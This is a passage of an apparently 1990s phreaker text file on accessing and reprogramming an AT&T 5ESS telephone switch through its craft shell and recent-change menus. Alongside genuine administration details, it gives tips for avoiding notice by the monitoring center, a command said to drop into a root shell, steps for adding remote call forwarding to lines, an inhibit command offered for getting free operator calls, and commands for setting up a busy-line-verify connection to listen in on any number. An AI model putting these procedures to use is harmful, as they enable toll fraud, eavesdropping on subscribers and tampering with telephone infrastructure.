+running on the DMERT (which is a UNIX environment development operating system,
+a System V hack). The Craft shell prompt is a "<".  From this shell one
+will see several error messages.  Here is a list and what they mean:
+
+     Error Message   Meaning
+
+     ?A              Action field contains an error
+     ?D              Data field contains an error
+     ?E              Error exists in the message but can not be resolved to
+                     the proper field (this is the "you have no idea" message)
+     ?I              Identification field contains an error
+     ?T              Time-out has occurred on channel
+     ?W              Warning exists in input line
+
+
+
+     Other output message meanings, from the RC/V craft menu.
+
+     OK              Good
+     PF              Printout follows
+     RL              Retry later
+     NG              No good, typically hardware failure
+                     (ie: SM does not exist)
+     IP              In progress
+     NA              The message was not received by the backup control
+                     process
+
+
+
+  When inputing RC messages it is best to do it in the middle of the day
+since RC messages are sent to each channel! The SCC is watching and if
+there are RC messages running across at 3 in the morning, the SCC is going
+to wonder what the hell RCMAC (Recent Change Memory Administration Center)
+is doing at three in the morning!  However, one may be hidden by MARCH's
+soaking, and the night shift at the SCC are overloaded and may miss
+what is going on while correcting other major problems. So it is up to
+you.
+
+
+DMERT
+~~~~~
+
+    The DMERT (Duplex Multiple Environment Real Time) uses the Western
+Electric (another name for AT$T!) 3B20D  Duplex processor (or 2 3B20S
+Simplex processors).  The DMERT software totals nearly nine thousand
+source files, one million lines of non-blank source code,
+and was developed by approximately 200 programers. There are eight main
+releases of this software, they are referred to as generics (like 5E4.1,
+5E4.2,  to 5E8.1 also seen as 5E4(1), 5E4(2) to 5E8(1), this can be though
+of as DOS version).  DMERT is similar to regular UNIX but can be best described
+as a custom UNIX system based on the 3B20D, the DMERT OS can be ported to
+PDP-11/70s or a large IBM Mainframe. The DMERT operating system is split both
+logically and physically.  Physically, the software is evenly divided across
+the five (there were seven Software Development systems all running a 3B20S
+where the DMERT code was written) Software Development systems. Logical, the
+software is divided into twenty-four different subsystems.  To access this
+from the "craft" shell of the RC/V channel, type:
+
+RCV:MENU:SH!
+
+NOTE:
+This will dump one to a root shell, from which VaxBuster's (Who knows nothing
+about VAXen, always wondered about him) file on how to redirect a TTY may
+come in useful.
+
+
+Programing the 5ESS
+~~~~~~~~~~~~~~~~~~~
+
+When programing the 5ESS there are things one should know, the first is that
+one has a lot of power (just keep 911 in mind,  it would be foolish to even
+think of disrupting anyones service.  911 is there for a reason, it should STAY
+that way).  And anything one does is logged, and can be watched from the
+SCC.  Note that the night SCC crew is a lot more lax on how things are done
+then the day shift, so it would be best to do this at night.  I could tell you
+how to crash the switch in two seconds, but that is not the point here.
+Destroying something is easy, anyone can do that, there is no point to it.
+All that taking down a switch will do is get one into jail, and get sued if
+someone needed 911 etc,... (I think SRI is wishing they had talked to me
+now).
+
+
+RC from Craft Shell on RC/V Channel
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+    RC and VFY is complex from the craft shell on the RC/V channel.
+This is called the input text option.  It is accessed by using the
+
+RCV:APPTEXT:
+
+    This gets a little complex to follow, but the best thing to do
+is to order the Manual 235-118-215 Recent Change Procedures Text Interface
+[5E4] it is $346.87, another good one to get is 235-118-242, for $413 even
+and last, but the best is 235-118-243, this beast is only $1344.63 what a
+deal. When calling the CIC they will transfer you to a rep. from your area.
+Gets to be kind of a pain in the ass, but.. Anyways, back on track:
+
+
+
+RCV:APPTEXT:DATA[,SUMMARY|,NSUMMARY][,VFYIMMED|,VFYEND][,VFYNMVAL|,VFYSCIMG]
+           [,DEVICE={STDOUT|ROP|ROP0|FILE|TTYx}],FORM=...,DATA,FORM=...,END;
+
+
+DATA     -  This is for more then one RC operation in the same command
+
+FORM     -  The format that is to be used
+
+SUMMARY  -  Turns on one line summaries on the read only printer (ROP) (DEFULT)
+NSUMMARY -  Turns off one line summary logging by the ROP
+
+VFYIMMED -  Prints out verifies (VFYs) immediately, does not wait for
+            session end.
+VFYEND   -  Prints out all VFYs at session end, this is the DEFULT.
+
+VFYNMVAL -  Print verify output in name-value pair format, this must be
+            directed into a file (see DEVICE).
+VFYSCIMG -  Makes output into screen size image (DEFULT).
+
+DEVICE   -  Redirect verify output to a device other than ones screen.
+
+            ROP/ROP0   -  Send verify output to the ROP
+
+            STDOUT     -  Send verify output to ones screen (DEFULT)
+
+            TTYx       - Send verify output to any valid tty (such as
+                         ttya and ttyv) that exists in "/dev."  You
+                         must use the tty name, not tty number.
+            FILE       - Send verify output to a file in "/rclog".  The
+                         file will be prefixed with "RCTX", and the user
+                         will be given the name of the file at the
+                         beginning and end of the APPTEXT session.
+END      -  END of message.
+
+
+
+ If the parameter is not entered on the command line, it may be
+entered after the APPTEXT process begins, but must be entered prior to the
+first "FORM=" statement. Here is a example of a MML RCV:APPTEXT.
+
+rcv:apptext:data,form=2v1&vfy,set="oe.entype"&lset="oe.len"&xxxxxxxx,pty=i,vfy!
+
+  The 2V1 may look strange at first, it may help getting use to the basics
+first. To just VFY telephone numbers, just do a:
+
+RCV:APPTEXT:DATA,FORM=1V6-VFY,TN=5551212,VFY,END!
+
+   Though I can not really explain this any more then I have just due to
+time and space.  These input messages may look complex at first, but are
+really simple, and much better then dealing with the menu system, but
+you will need to learn RC yourself! No one can explain it to you.
+
+
+Pulling AMA from the RC/V channel Craft Shell
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+
+Pulling AMA up is done with one command. The command is:
+
+
+OP:AMA:SESSION[,ST1|,ST2];
+
+ This command will request a report of the current or most recent automatic
+message accounting (AMA) tape. ST1 and ST2 are the data streams.
+
+
+
+Pulling up out of Service Lines, Trunks or Trunk Groups
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+   One may want to pull up all the out of service lines, trunks, or
+trunk groups for many reasons.  These reasons i will not go into, but
+from which lines can be set up. The command to do this from the craft
+shell is a PDS command, this command is with a 'ball bat' (a `` ! '').
+
+
+   OP:LIST,LINES[,FULL][,PRINT][;[a][,b][,c][,d][,e]]!
+
+   OP:LIST,TRUNKS[,FULL][,PRINT][;[a][,b][,c][,d][,e]]!
+
+   OP:LIST,TG [,FULL][,PRINT][;[a][,b][,c][,d][,e]]!
+
+
+
+FULL    -   All (primary and pending) are printed. Note FULL is not the
+            default when inputing this command.
+
+PRINT   -   Print to the ROP in the CO.  (Not a good idea)
+
+a-e     -   This is port status to match against the subset of trunks, lines
+            or trunk groups that are specified.  (This is required input
+            for FULL)
+
+
+
+
+The 5ESS RC/V Menu Shell
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+To access this shell from the RC/V channel craft shell, type:
+
+RCV:MENU:APPRC
+
+at the `` < '' prompt.
+
+To access the 5ESS RC/V menu system from the MCC, STLWS, and TLWS
+channel/terminals, one uses what are called pokes.  The poke that
+is used here to access the RC/V Menu system on the 5ESS is 196.
+
+Type 196 at the `` CMD< '' prompt, and you are on the RC/V menu system
+of the 5ESS switch. This will cause ``RC/V 196 STARTING'' and
+``RC/V 196 COMPLETED'' to be printed out on the ROP.
+
+
+Either way, this will toss you into a menu system. The main menu looks like
+this:
+
+------------------------------------------------------------------------------
+
+
+
+                               5ESS SWITCH  WCDS0
+                        RECENT CHANGE AND VERIFY CLASSES
+
+
+H RCV HELP              9  DIGIT ANALYSIS          20 SM PACK & SUBPACK
+A ADMINISTRATION        10 ROUTING & CHARGING      21 OSPS FEATURE DEFINITION
+B BATCH INPUT PARMS     11 CUTOVER STATUS          22 ISDN -- EQUIPMENT
+1 LINES                 12 BRCS FEATURE DEFINITION 23 ISDN
+2 LINES -- OE           13 TRAFFIC MEASUREMENTS    24 APPLICATIONS PROCESSOR
+3 LINES -- MLHG         14 LINE & TRUNK TEST       25 LARGE DATA MOVEMENT
+4 LINES -- MISC.        15 COMMON NTWK INTERFACE   26 OSPS TOLL & ASSIST/ISP
+5 TRUNKS17 CM MODULE                               27 OSPS TOLL & ASSIST
+7 TRUNKS - MISC.        18 SM & REMOTE TERMINALS   28 GLOBAL RC - LINES
+8 OFFICE MISC. & ALARMS 19 SM UNIT
+
+
+Menu Commands:
+
+
+
+
+------------------------------------------------------------------------------
+
+  The help menus for the 5ESS switch are lame, but I though that it would
+be good to show them to you just for the hell of it, because it does explain
+a little about the switch.
+
+------------------------------------------------------------------------------
+
+
+
+
+                           SCREEN 1 OF 7  5ESS SWITCH
+                             RECENT CHANGE VIEW H.1
+                            COMMANDS FOR MENU PAGES
+
+    H  - Explains commands for MENU or views. If you enter H again, then it
+         will display next HELP page.
+    H# - Select HELP page. (# - help page number)
+    Q  - Quit Recent Change and Verify.
+    R  - Change mode to RECENT CHANGE
+    V  - Change mode to VERIFY
+    <  - Go to CLASS MENU page.
+    #  - If on CLASS MENU page Go to a VIEW MENU page #.
+    #  - If on VIEW MENU page Go to a RECENT CHANGE or VERIFY VIEW #.
+    #.# - Go to a RECENT CHANGE or VERIFY VIEW. (CLASS#.VIEW#)
+
+
+
+
+              ---------------------------------------------------
+
+
+                           SCREEN 2 OF 7  5ESS SWITCH
+                             RECENT CHANGE VIEW H.1
+                            COMMANDS FOR MENU PAGES
+
+   #R  - Go to Recent Change view for read.
+   #I  - Go to Recent Change view for insert.
+   #D  - Go to Recent Change view for delete (only print Key fields).
+   #DV - Go to Recent Change view for delete with verify (print all fields).
+   #U  - Go to Recent Change view for update.
+   #UI - Go to Recent Change view for update in insert mode (user can change
+         each field sequentially without typing field number).
+   #V  - Go to Verify view.
+   #N  - Go to next menu page. Back to the 1st page if there's no next page.
+
+
+                ------------------------------------------------
+
+
+                           SCREEN 3 OF 7 5ESS SWITCH
+                             RECENT CHANGE VIEW H.1
+                               COMMANDS FOR BATCH
+
+BMI - Delayed Activation Mode. Choose time or demand release (for time
+      release add service information). Select view number for Recent Change.
+BMD - Display Status of Delayed Activation Recent Changes.
+BMR - Release a file of Recent Changes stored for Delayed Activation.
+IM  - Immediate Release Mode.
+
+
+
+
+                ________________________________________________
+
+
+                           SCREEN 4 OF 7  5ESS SWITCH
+                             RECENT CHANGE VIEW H.1
+                               COMMANDS FOR VIEWS
+
+
+     < - In first field: Leave this view and return to select view number.
+     < - Not in first field: Return to first field.
+     ^ - In first field: Select new operation for this view.
+     ^ - Not in first field: Return to previous field.
+     > or ; - Go to end of view or stop at next required field.
+     * - Execute the operation or go to next required field.
+     ? - Toggle help messages on and off.
+     Q - Abort this view and start over.
+     V - Validate input for errors or warnings.
+
+
+
+                ________________________________________________
+
+
+                           SCREEN 5 OF 7  5ESS SWITCH
+                             RECENT CHANGE VIEW H.1
+                               COMMANDS FOR VIEWS
+
+   R - Review view from Data Base.
+   I - Insert this view into Data Base.
+   U - Update this view into Data Base.
+   D - Delete this view from Data Base (only print Key fields).
+   C - CHANGE: Change a field - All fields may be changed except key fields
+       when in the update mode only.
+   C - CHANGE-INSERT: Allowed in the review mode only - Allows you to review
+   C - CHANGE-INSERT: Allowed in the review mode only - Allows you to review
+       a view and then insert a new view with similar field. You must change
+       the key fields to use this facility. You may change other fields as
+       required by the new view.
+   P - Print hard copy of screen image (must have RC/V printer attached).
+
+
+
+                ________________________________________________
+
+
+
+                           SCREEN 6 OF 7  5ESS SWITCH
+                             RECENT CHANGE VIEW H.1
+                               COMMANDS FOR VIEWS
+
+             The following are used only on views containing LISTS.
+
+
+           ` - Blank entire row.
+           - Sets this field to its default value.
+           : - Sets this row to its default value.
+           [ - Go backward to previous row.
+           ] - Go forward to next row.
+           ; - Go to end of view or stop at next required field.
+           # - Go to end of list and stop at next non-list field.
+           { - Delete current row and move next row to current row.
+           } - Move current row to next row and allow insert of row.
+           = - Copy previous row to current row.
+           * - Execute the operation or stop at next required field.
+
+
+
+
+                ________________________________________________
+
+                           SCREEN 7 OF 7 5ESS SWITCH
+                             RECENT CHANGE VIEW H.1
+                   COMMANDS FOR AUTOMATIC FORMS PRESENTATION
+
+          If RC/V is in automatic forms presentation and "Q" or "q" is
+        entered for the operation, the following commands are available.
+
+     A - Abort form fields.  RC/V stays in the current form.
+     B - Bypass form.  Go to next form using automatic forms presentation.
+     C - Cancel automatic forms presentation.  The previous menu
+         will be displayed.
+     H - Display automatic forms presentation help messages.
+     < - Bypass form.  Go to next form using automatic forms presentation.
+
+
+
+
+
+
+
+______________________________________________________________________________
+
+
+
+When accessing the databases, here is a list of database access selections:
+
+   I (insert) - Insert new data
+   R (review) - Review existing data
+   U (update) - Update or change existing data
+   D (delete) - Delete (remove) unwanted data from the data base
+   V (verify) - Verify the data in the data base.
+
+These are to be entered when one sees the prompt:
+
+-----------------------------------------------------------------------------
+
+Enter Database Operation
+I=Insert R=Review U=Update D=Delete : _
+
+------------------------------------------------------------------------------
+
+
+When using the RC/V menu system of the 5ESS, you may go and just keep going into
+sub-menus, and fall off the end of the Earth. Here are the navigational
+commands that are used to move around the menu system. As seen from the
+RC/V menu system help, you see "SCREEN X out of X."  This means that there are
+so many screens to go and to move between the screens you use the `` < '' to
+move back (toward main menu) and `` > '' to move to the last menu. I know it
+is shown in the help menu, but it is not explained like it needs to be.
+
+
+
+Batch Input
+~~~~~~~~~~~
+
+The Batch Input feature for the 5ESS switch allows recent changes (RC)
+to be entered at any date and time when the RC update would be
+performed.  This allows RC input to be entered quickly, and for a large
+number of inputs. The large numbers of RC input can be released
+quickly in  batch mode.  The RC input can then be entered at any time,
+stored until needed, and then released for use by the system
+whenever needed, at any specific date and/or time.
+  First and second level error correction is done during batch input.
+  There are several different modes of batch input. These are:
+
+      BMI - batch mode input - TIMEREL and DEMAND
+      BMD - batch mode display
+      BMR - batch mode release
+
+
+
+BMI - Batch Mode Input - TIMEREL and DEMAND
+
+
+Entering BMI (Batch Mode Input), one types `` BMI '' at the RC/V
+menu prompt. Once entering, you will be prompted with whether
+the input is DEMAND (demand) or TIMEREL (Time Release). DEMAND
+input allows one to manual have the batch update the database,
+TIMEREL is automatic. TIMEREL has one enter a time and date.
+  When using DEMAND, you will be prompted for the file name. The
+file will be in `` /rclog '' in the DMERT OS.
+  In TIMEREL, you will be prompted with the CLERK-ID, which in this
+case is the file name for the file in the `` /rclog ''. Then
+for VERBOSE options, the RC SRVOR (Recent Change Service Order)
+is displayed on the screen.
+
+
+-RC SRVOR View in the BMI TIMEREL Batch Option-
+------------------------------------------------------------------------------
+
+
+
+                              5ESS SWITCH
+                           RECENT CHANGE  B.1
+                        SERVICE ORDER NUMBER VIEW
+
+     *1. ORDNO     __________
+     *2. ITNO      ____
+     *3. MSGNO     ____
+
+     #4. RDATE     ______
+     #5. RTIME     ____
+
+
+
+Enter Insert, Change, Validate, or Print:
+
+
+-----------------------------------------------------------------------------
+
+
+ORDNO = Service Order Number
+ITNO  = Item Number
+MSGNO = Message Number
+RDATE = Release Date (Update database Date)
+RTIME = Release Time (Update database Time)
+
+
+
+
+BMD - batch mode display
+
+
+   BMD is a "mask" of RC/V done from the RC/V channel craft shell, by using the
+REPT:RCHIST or a pseudo menu system. All transactions are displayed on the ROP,
+though the data could also be sent to a file in the `` /rclog '' in DMERT.
+   The Pseudo menu system looks like:
+
+----------------------------------------------------------------------------
+
+
+1. Summary of clerk activity
+
+2. Activity by service order number
+
+3. Activity by clerk ID
+
+4. Return to view or class menu.
+
+
+----------------------------------------------------------------------------
+
+1  allows one to view the "DELAYED RELEASE SUMMARY REPORT."
+2  produces a "DELAYED RELEASE REPORT BY SERVICE ORDER."
+3  produces the "DELAYED RELEASE REPORT BY CLERK ID."
+4  Return to view or class menu, self-explanatory.
+
+
+
+REPT:RCHIST - BMD
+
+  The REPT:RCHIST BMD (Text) command is done from the RC/V channel craft
+shell. The command synopsis is:
+
+
+5E2 - 5E5 (Generics)
+
+REPT:RCHIST,CLERK=[,FORMAT={SUMMARY|DETAIL}]{[,ALL]|[,PENDING][,COMPLETE]
+[,ERROR][,DEMAND]}[,DEST=FILENAME][,TIME=XXXXXXXXXX];
+
+
+5E6 - 5E8 (Generics)
+
+REPT:RCHIST,CLERK=a[,FORMAT={SUMMARY|DETAIL}] {,ALL|,b}[,DEST={c|FILE}]
+[,TIME=XXXXXXXXXX];
+
+SUMMARY         - Report selection, format by key.
+DETAIL          - Report selection for Recent Change entire.
+ALL             - Report all recent changes.
+PENDING         - Report pending recent change input.
+COMPLETE        - Report released recent changes that was successful
+                  when completed.
+FILE            - Name for file in /rclog
+ERROR           - Report recent changes released with error.
+DEMAND          - Report demand recent changes.
+TIME=XXXXXXXXXX - XX - mounth, XX - day, XX - hour, XX minute, XX - Second
+
+
+
+
+
+BMR - batch mode release
+
+
+    This is the manual release (updating) of the 5ESS database. This is done
+from the RC/V channel craft shell.  The command that is used is the EXC:RCRLS
+input message. There is no real need to go into this message.
+
+Adding RCF (Remote Call Forward) on a 5ESS
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+1. At the "MENU COMMANDS" commands prompt of the 5ESS main menu in the
+   RC/V APPRC menu system of the 5ESS, enter '12' for the "BRCS FEATURE
+   DEFINITION".  Then access screen '1.11', this is the BRCS screen. When it
+   asks you to 'ENTER DATABASE OPERATION' enter "U" for Update and hit
+   return.
+
+   NOTE: When at menu '12,' you will NOT see '1.11' listed in the menu
+   options.  By just accessing menu '1' you will not be able to add features.
+   This is a problem with the 5ESS menu system.
+
+2. Type in the Telephone Number. It should look like this:
+
+
+
+------------------------------------------------------------------------------
+
+  Mon Feb 31 09:09:09 2001    RFA_TN
+
+  -------------------------------------------------------------------------
+
+                           5ESS SWITCH WCDS0
+  SCREEN 1 OF 2           RECENT CHANGE 1.11
+                BRCS FEATURE ASSIGNMENT (LINE ASSIGNMENT)
+
+ *1. TN 5551212    * 2. OE  _ ________    3. LCC ___   4. PIC 288
+ *5. PTY _*          6. MLHG ____         7. MEMB ____ 8. BFGN _______ _
+
+                        FEATURE LIST (FEATLIST)
+  ROW   11. FEATURE  A P   15. FEATURE  A P  19. FEATURE  A P  23. FEATURE  A P
+  1.        /CFV     N _       ________ _ _      ________ _ _      ________ _ _
+  2.        ________ _ _       ________ _ _      ________ _ _      ________ _ _
+  3.        ________ _ _       ________ _ _      ________ _ _      ________ _ _
+  4.        ________ _ _       ________ _ _      ________ _ _      ________ _ _
+
+
+------------------------------------------------------------------------------
+
+   and will prompt you with:
+
+------------------------------------------------------------------------------
+
+Enter Insert, Change, Validate, screen#, or Print: _
+form operation prompt
+
+------------------------------------------------------------------------------
+
+          I   -   to insert a form
+          C   -   to change a field on a form
+          V   -   to validate the form
+          A   -   to display the desired screen number
+          P   -   to print the current screen
+          U   -   to update the form
+
+
+   Enter `` C '' to change, access filed 11 and row 1 (goto the /CFV
+   wherever it may be) or add /CFR if it is not there. If it does though,
+   leave the "A" (Active) field "N" (Yes or No). Change the P (Presentation)
+   column to "U" (Update). Then Hit Return.
+
+   NOTE: Different Generics have other fields, one of them being a AC (Access
+   Code) field.  This field is a logical field, that mean only accepts a
+   "Y" for yes and "N" for no.  Also when adding the feature to the switch,
+   the row and field numbers may not be shown, but will always follow this
+   pattern.  Also note that the /CFV (Call forwarding variable) feature may not
+   be there, there maybe no features on the line.  These examples are from
+   Generic 4 (2).  Here is a example of 5E8 (which is not used too many places,
+   but this is what menu 1.11 in the BRCS Feature Definition looks like:
+
+
+-------------------------------------------------------------------------------
+
+
+                             5ESS SWITCH
+                    SCREEN 1 OF 2 RECENT CHANGE  1.11
+                (5112,5113)BRCS FEATURE ASSIGNMENT (LINE)
+
+(*)1. TN _______ (*)2. OE  _ ________    3. LCC ___   4. PID ___
+(*)6. MLHG ____     8. BFGN _______ _
+(*)5. PTY _(*)                                7. MEMB ____
+
+                     11. FEATURE LIST (FEATLIST)
+ ROW  FEATURE   A P AC R    ROW  FEATURE   A P AC R    ROW  FEATURE   A P AC R
+ 1    ________  _ _ _  _     8   ________  _ _ _  _    15   ________  _ _ _  _
+ 2    ________  _ _ _  _     9   ________  _ _ _  _    16   ________  _ _ _  _
+ 3    ________  _ _ _  _    10   ________  _ _ _  _    17   ________  _ _ _  _
+ 4    ________  _ _ _  _    11   ________  _ _ _  _    18   ________  _ _ _  _
+ 5    ________  _ _ _  _    12   ________  _ _ _  _    19   ________  _ _ _  _
+ 6    ________  _ _ _  _    13   ________  _ _ _  _    20   ________  _ _ _  _
+ 7    ________  _ _ _  _    14   ________  _ _ _  _    21   ________  _ _ _  _
+
+
+
+Enter Insert, Change, Validate, screen#, or Print: _
+
+
+-------------------------------------------------------------------------------
+
+
+
+   Hit Return twice to get back to "ENTER UPDATE, CHANGE, SCREEN #, OR PRINT:".
+   Enter a "U" for update and hit Return. It will say "FORM UPDATE".
+
+3. Next access screen 1.22, call forwarding (line parameters) or it will
+   just come up automatically if you set the "P" to "U".
+
+
+
+------------------------------------------------------------------------------
+
+  Mon Feb 31 09:09:09 2001    RCFLNTN
+
+    ----------------------------------------------------------------------
+
+
+                            5ESS SWITCH WCDS0
+                           RECENT CHANGE 1.22
+                  CALL FORWARDING (LINE PARAMETERS)
+
+
+   *1. TN            5551212
+   *6. FEATURE       CFR
+    9. FWDTODN       ______________________________
+   10. BILLAFTX      0                    16. SIMINTER       99
+   11. TIMEOUT       0                    17. SIMINTRA       99
+   12. BSTNINTVL     0                    18. CFMAX          32
+   13. CPTNINTVL     0                    19. BSRING         N
+
+
+
+-------------------------------------------------------------------------------
+
+
+4. If you used the automatic forms presentation, it will have the telephone
+   number already on LINE1. If not retype the telephone number you want
+   forwarded. The bottom of the screen will say "ENTER UPDATE, CHANGE, VALIDATE
+   OR PRINT:", type "C" for change and hit return.
+
+5. When it says CHANGE FIELD type "9" and enter your forward to DN (Destination
+   Number) including NPA if necessary. This will put you back to the "CHANGE
+   FIELD" prompt. Hit return again for the "ENTER UPDATE, CHANGE, VALIDATE OR
+   PRINT:". Hit "U" for Update form and wait for "FORM UPDATED".
+
+6. Lastly, access screen 1.12, BRCS FEATURE ACTIVATION (LINE ASSIGNMENT). At the
+   prompt enter a "U" for Update, and on ROW 11 Line 1 (or wherever), change
+   the "N" in column "A" to a "Y" for Yes, and you are done.
+
+
+
+Adding other features
+~~~~~~~~~~~~~~~~~~~~~
+
+  To add other features onto a line, follow the same format for adding the
+/CFR, but you may not need to access 1.22.  Some other features are:
+
+Feature Code:          Feature Name:
+
+/LIDLXA            -   CLID
+/CFR               -   Remote Call Forward
+/CWC1              -   Call Waiting
+/CFBLIO            -   call forward busy line i/o
+/CFDAIO            -   call forward don't answer i/o
+/CFV               -   call forwarding variable
+/CPUO              -   call pick up o  !used in the selq1 field!
+/CPUT              -   call pick up t  !used in the tpredq field!
+/CWC1D             -   Premiere call waiting
+/DRIC              -   Dist. ring
+/IDCT10            -   Inter room ID
+/IDCTX2            -   1digit SC
+/IDCTX2            -   Interoom ID 2
+/IDCTX2            -   Premiere 7/30, convenience dialing
+/IDCTX3            -   Premiere 7/30, no cd
+/IDMVP1            -   Premiere 2/6, no convenience dialing
+/IDMVP2            -   Premiere 2/6, CD, not control sta.
+/IDMVP3            -   Premiere 2/6, CD, control station
+/MWCH1             -   Call hold
+/MWCTIA2           -   Call transfer 2
+/TGUUT             -   Terminal group ID number with TG view (1.29).
+
+
+
+
+ANI/F  the whole switch
+~~~~~~~~~~~~~~~~~~~~~~~
+
+ Automatic Number Identification failure (also called "dark calls") are
+caused by variety of different things.  To understand this better, here are
+the technical names and causes, note this is not in stone and the causes
+are not the only causes for a ANI-F to occur.
+
+ANF   -- Failure to receive automatic number identification
+         (ANI) digits on incoming local access and transport
+         area (LATA) trunk.
+ANF2  -- Automatic number identification (ANI) collected by
+         an operator following a failure to receive ANI
+         digits on an incoming centralized automatic
+         message accounting (CAMA) trunk from the DTMF decoder.
+ANI   -- Time-out waiting for far off-hook from Traffic
+         Service Position System (TSPS) before sending ANI
+         digits.
+
+  Though, I have always wondered how to set one up myself in a safe way.
+ One way nice way to get ANI/F through a 5ESS to use a inhibit command.
+
+      INH:CAMAONI;
+
+The command will inhibits centralized automatic message accounting (CAMA)
+operator number identification (ONI) processing. This is done from the DTMF
+decoder (going over later).  This message will cause a minor alarm too occur.
+If in the CO when the alarm occurs, you will here this bell all the time,
+because something is always going out. In this case, this alarm is a level 1
+(max to five) and the bell will ring once.
+  Once this message is inputed, all calls through CAMA operator will be
+free of change. So just dial the operator and you will have free calls.
+
+To place this back on the switch, just type:
+
+      ALW:CAMAONI;
+
+and the minor alarm will stop, and things will go back to normal.
+
+
+
+Setting up your own BLV on the 5ESS from the Craft shell RC/V Channel
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+  Well, we have come to the fun part, how to access the No-Test trunk on
+the 5ESS (this is also called adding the third trunk). I will not be too
+specific on how to do this.  You will need to figure out just how to do this.
+  The first thing you want to do is to request a seizure of a line for
+interactive trunk and line testing. One must assign a test position (TP).
+
+SET:WSPHONE,TP=a,DN=b
+SET:WSPOS,TP=a,DN=b
+
+          a = A number between 1 and 8
+          b = The number you wish assigned to the test position
+
+  This will chose a number to be the test number on the switch. Now using
+the CONN:WSLINE one can set up a BLV.
+
+
+CONN:WSLINE,TP=a,DN=b;
+
+          a = TP that you set from the SET:WSPOS
+          b = The number you want to BLV
+
+To set this up on a MLHG (can come in real useful for those peksy
+                           public packet switched networks), do a:
+
+CONN:WSLINE,TP=a,MLHG=x-y;
+
+          x = MLHG number, y = MLHG member number
+
+
+
+To take set things back to normal and disconnect the BLV do a:
+
+DISC:WSPHONE,TP=z
+
+          z = TP 1 through 8
+
+
+NOTE:
+
+One may need to do a ALW:CALLMON before entering the CONN commands
+
+BIG NOTE:
+
+If you set your home telephone number as the test position, and you
+have only one phone line, you are stupid.
+
+
+
+
+Comments about the Underground
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+   There are a few people out there who have no idea what they are doing, and
+go on thinking they know it all (i.e. No Name Brand).  It pisses me off when
+these people just go off and make shit up about things they have no idea
+what they are talking about.
+   This file is to all the lazy people out there that just keep bitching
+and moaning about not knowing where to find information.
+
+
+
+Other Sources
+~~~~~~~~~~~~~
+
+Here is a list of Manuals that you can order from the CIC (1-800-432-6600).
+Note that some of these manuals are well over hundreds of dollars.
+
+
+Manual 234-105-110   System Maintenance Requirements and Tools
+Manual 235-001-001   Documentation Guide
+Manual 235-070-100   Switch Administration Guidelines
+Manual 235-100-125   System Description
+Manual 235-105-110   System Maintenance Requirements and Tools
+Manual 235-105-200   Precutover and Cutover Procedures
+Manual 235-105-210   Routine Operations and Maintenance
+Manual 235-105-220   Corrective Maintenance
+Manual 235-105-231   Hardware Change Procedures - Growth
+Manual 235-105-24x   Generic Retrofit Procedures
+Manual 235-105-250   System Recovery
+Manual 235-105-250A  Craft Terminal Lockout Job Aid
+Manual 235-105-331   Hardware Change Procedures - Degrowth
+Manual 235-105-44x   Large Terminal Growth Procedures
+Manual 235-118-200   Recent Change Procedures Menu Mode Generic Program
+Manual 235-118-210   Recent Change Procedures Menu Mode
+Manual 235-118-213   Menu Mode 5E4 Software Release
+Manual 235-118-214   Batch Release 5E4 Software Release
+Manual 235-118-215   Text Interface 5E4 Software Release
+Manual 235-118-216   Recent Change Procedures
+Manual 235-118-217   Recent Change Procedures Batch Release 5E5 Software
+                     Release
+Manual 235-118-218   Recent Change Attribute Definitions 5E5 Software Release
+Manual 235-118-21x   Recent Change Procedures - Menu Mode
+Manual 235-118-224   Recent Change Procedures 5E6 Software Release
+Manual 235-118-225   Recent Change Reference 5E6 Software Release
+Manual 235-118-240   Recent Change Procedures
+Manual 235-118-241   Recent Change Reference
+Manual 235-118-242   Recent Change Procedures 5E8 Software Release
+Manual 235-118-24x   Recent Change Procedures
+Manual 235-118-311   Using RMAS 5E4 Software Release
+Manual 235-118-400   Office Records and Database Query 5E4 Software Release
+Manual 235-190-101   Business and Residence Modular Features **
+Manual 235-190-105   ISDN Features and Applications
+Manual 235-190-115   Local and Toll System Features
+Manual 235-190-120   Common Channel Signaling Service Features
+Manual 235-190-130   Local Area Services Features
+Manual 235-190-300   Billing Features
+Manual 235-600-103   Translations Data
+Manual 235-600-30x   ECD/SG Data Base
+Manual 235-600-400   Audits
+Manual 235-600-500   Assert Manual
+Manual 235-600-601   Processor Recovery Messages
+Manual 235-700-300   Peripheral Diagnostic Language
+Manual 235-900-101   Technical Specification and System Description
+Manual 235-900-103   Technical Specification
+Manual 235-900-104   Product Specification
+Manual 235-900-10x   Product Specification
+Manual 235-900-301   ISDN Basic Rate Interface Specification
+Manual 250-505-100   OSPS Description and Procedures
+Manual 363-200-101   DCLU Integrated SLC Carrier System
+Manual TG-5          Translation Guide
+
+Practice 254-341-100 File System Software Subsystem Description
+                     3B20D Computer
+Practice 254-301-110 Input-Output Processor Peripheral Controllers
+                     Description and Theory of Operation AT$T 3B20D
+                     Model 1 Computer   None.
+Practice 254-341-220 3B20 System Diagnostic Software Subsystem
+                     Description 3B20D Processor
+
+CIC Select Code 303-001 Craft Interface User's Guide
+CIC Select Code 303-002 Diagnostics User's Guide
+CIC Select Code 303-006 AT$T AM UNIX RTR Operating System, System
+                        Audits Guide
+
+IM-5D000-01 Input Manual
+OM-5d000-01 Output Manual
+
+OPA-5P670-01 The Administrator User Guide
+OPA-5P672-01 The Operator User Guide
+OPA-5P674-01 The RMAS Generic - Provided User Masks
+
+
+Trademarks
+~~~~~~~~~~
+
+5ESS - Registered trademark of AT$T.
+CLCI - Trademark of Bell Communications Research, Inc.
+CLLI - Trademark of Bell Communications Research, Inc.
+ESS - Trademark of AT$T.
+SLC - Registered trademark of AT$T.
+UNIX - Registered trademark of AT$T.
+DMERT - Registered trademark of AT$T.
+SCCS - Registered trademark of AT$T
+DMS - Registered trademark of Northern Telecom
+DEC - Registered trademark of Digital Equipment Corporation.
+VT100 - Trademark of Digital Equipment Corporation.
+
+
+Acronyms and Abbreviations
